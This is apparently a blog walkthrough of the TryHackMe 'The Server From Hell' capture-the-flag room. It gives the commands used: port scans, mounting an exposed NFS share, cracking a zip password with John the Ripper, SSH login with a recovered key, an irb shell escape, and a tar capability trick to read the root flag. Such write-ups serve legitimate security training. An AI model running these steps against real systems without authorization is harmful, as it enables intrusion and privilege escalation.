Tryhackme Walkthrough :TheServer From Hell

In this articles we are going to solve a another Tryhackme challenge called TheserverfromHell created by Youssef Awad .So without wasting time let go.

Level : Easy

Attacking Strategy

  • Enumeration
    • netcat
    • NFS
  • Exploitation
    • cracking zip file
    • irb shell
  • Privilege Escalation
    • getcap to check file capabilities

Enumeration

Using Rustscan we perform reconnaissance , but as in lab descrption they said check port 1337 so we look into it and there is a hint which tells there something in first 100 ports so scan 100 ports with the help of rustscan.

netcat 10.10.50.215 1337
rustscan --ulimit 5001 -r 1-110 10.10.50.215 -- -sC -sV -oN nmap

While checking all the 100 ports our eyes get caught this string on port 21 which by default for FTP Service but here in banner it specify check 12345 .

when we check out the port 12345 with the help of netcat, where we found the another hint which leads to NFS . From the hint we found /home/nfs directory can by mount .

After mounting the file system we get the some backup zip which is password protected .

netcat 10.10.50.215 12345
showmount -e 10.10.50.215
mkdir /tmp/serverfromhell
sudo mount -t nfs 10.10.50.215:/home/nfs /tmp/serverfromhell

Exploitation

Now it time to crack the zip password and there are different ways to do that weather you can use frackzip or you can use the john the ripper .

zip2john backup.zip >backup.hash
john --wordlist=../../rockyou.txt backup.hash

Now we have the credentials to unzip the backup.zip and after doing we find out that we have key which help us to login into the remote server using ssh pass wordless login but on default port 22 we get the bad request but there is a hint which tells that something is between 2500-4500 so we again load our rustscan to enumerate more and we found that port 3333 have openssh service running .

rustscan --ulimit 5001 -r 2500-4500 10.10.50.215 -- -sC -sV -oN hint_nmap

Privilege Escalation

Now let’s login to the server with the help of id_rsa key and after login we found that we land on a ruby interactive shell and to get the bash we have to use system function .

chmod 0600 id_rsa
ssh -i id_rsa [email protected] -p 3333
system "/bin/bash"

Now it’s time to get the root power for that let enumerate more and we found hint about getcap and with help of GTFOBIN we exploit it.

getcap -r / 2>/dev/null
tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'

Contact : [email protected] or DM us on twitter.

Thankyou

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.